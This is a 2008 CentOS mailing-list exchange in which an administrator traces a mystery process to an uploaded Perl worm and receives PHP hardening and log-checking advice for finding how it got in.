[CentOS] mystery process "unit"

Tue Aug 12 14:16:20 UTC 2008
Rainer Duffner <rainer at ultra-secure.de>

sbeam schrieb:

> On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
>> maybe you should check with "lsof -p 3041" and see which files/pipes it
>> uses to have a clue.
> of course! <slap>
> it's a perl w0rm that was uploaded last night, now killed. Now to determine 
> how it got in.
> I found some output in the main apache error log that looks like wget was used 
> to download a shellbot. But I can't figure out how wget was called, may be 
> some PHP exec() call that is unchecked. 

Anything in /tmp ?

Disable register_globals and allow_url_fopen.
Set open_basedir for any virtual hosts to the absolute minimum.

That will help a bit.

> But I can't find it on the system yet or the data files it uses.
> chkrootkit says all is clear.
> mod_security is now being installed, belatedly. This server has only been up 1 
> week, sheesh.
> thanks
> Sam

It was most likely executed via a remote server. Look for URLs in the 
logs that fetch stuff from remote servers.